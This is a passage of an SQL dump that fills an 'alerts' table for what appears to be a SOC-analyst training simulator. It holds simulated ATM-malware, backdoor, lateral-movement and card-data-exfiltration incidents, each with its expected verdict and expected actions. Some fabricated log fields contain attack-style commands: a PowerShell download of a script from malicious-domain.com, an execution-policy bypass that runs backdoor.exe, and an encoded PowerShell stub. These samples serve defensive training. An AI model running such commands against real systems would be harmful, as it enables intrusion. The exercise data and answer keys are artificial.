Repository\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing attempts\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware\"}},{\"id\":\"artifact_6\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email domain linked to phishing activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(808, 'Malware Execution Triggered', 'high', 'Endpoint Detection System', 'A custom malware designed to infiltrate ATM management systems has been executed on a compromised endpoint. The malware aims to establish a foothold within the network.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"evt-123456\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"destination_port\":4444,\"username\":\"jdoe\",\"process_name\":\"atm_manager.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_description\":\"Execution of suspicious process detected\",\"host_name\":\"ATM-Server-01\",\"malware_name\":\"ATMInfiltrator\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalRecords\",\"verdict\":\"internal\",\"details\":\"Internal ATM management server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to ATMInfiltrator malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_manager.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalRecords\",\"verdict\":\"suspicious\",\"details\":\"Unusual process execution detected on ATM management server\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(809, 'Backdoor Installation Identified', 'high', 'System Integrity Monitoring', 'A backdoor was installed on the compromised system to ensure continued access. This action was detected when an unauthorized remote access tool was found running persistently.', 'Persistence', 'T1059.001', 1, 'new', NULL, '{\"event_time\":\"2023-10-25T14:32:00Z\",\"event_type\":\"file_creation\",\"host_ip\":\"192.168.10.15\",\"external_ip\":\"203.0.113.45\",\"username\":\"compromised_user\",\"file\":{\"path\":\"C:\\\\Windows\\\\System32\\\\\",\"name\":\"backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Windows\\\\System32\\\\backdoor.exe\"}}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File name commonly used by backdoor trojans.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting abnormal behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.457Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_time\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"host_ip\\\":\\\"192.168.10.15\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\\\\",\\\"name\\\":\\\"backdoor.exe\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"process\\\":{\\\"name\\\":\\\"powershell.exe\\\",\\\"command_line\\\":\\\"powershell -ExecutionPolicy Bypass -File C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(810, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'Anomalous network traffic detected indicating potential lateral movement by The Cobalt Group. The group is attempting to navigate through the network aiming at key systems managing ATM operations.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.3.25\",\"username\":\"atm_admin\",\"protocol\":\"SMB\",\"file_accessed\":\"\\\\\\\\10.1.3.25\\\\C$\\\\Windows\\\\System32\\\\atm_operations.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"action\":\"File Access\",\"device\":\"192.168.1.15\",\"status\":\"Successful\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cobalt Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.3.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical ATM infrastructure server.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cobalt Group malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"atm_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account used in lateral movement attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(811, 'ATM Software Manipulation Attempt', 'high', 'ATM Software Logs', 'An attempt was detected to manipulate ATM software, potentially allowing unauthorized cash withdrawals.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":\"ATM-EXEC-005\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"username\":\"atm_user\",\"process_name\":\"atm_dispense.exe\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"action\":\"Execution\",\"status\":\"Attempted execution of unauthorized software detected\",\"remarks\":\"Detected suspicious execution attempt exploiting ATM software vulnerability.\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ATM software exploitation campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal ATM machine IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"atm_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"clean\",\"details\":\"Registered ATM service account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_dispense.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable used in unauthorized ATM cash withdrawal attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with ATM manipulation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(812, 'Card Processing Network Breach', 'high', 'Card Processing Logs', 'Sensitive data from card processing networks is extracted to facilitate fraudulent transactions. A suspicious outbound connection was detected transferring sensitive card data.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:10Z\",\"event_id\":\"123456\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"export_data_2023.zip\",\"file_hash\":\"a9b1c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"event_description\":\"Data transfer detected to external IP suspected for exfiltration.\",\"protocol\":\"HTTPS\",\"bytes_sent\":10485760,\"application\":\"card_process_app_v1.2\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with card data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of card processing server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"export_data_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal System\",\"verdict\":\"suspicious\",\"details\":\"Filename indicates potential data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9b1c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltration malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(813, 'Money Mule Coordination', 'medium', 'Communications Monitoring', 'Detected coordination with a network of mules to physically collect dispensed cash. Communication with known malicious IPs observed.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:35Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"username\":\"jdoe\",\"email\":\"mule_coordinator@example.com\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"money_mule_schedule.xlsx\",\"malicious_command\":\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\",\"communication_type\":\"email\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known threat actor IP associated with financial crimes.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"mule_coordinator@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual email activity related to financial transactions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in financial scams.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 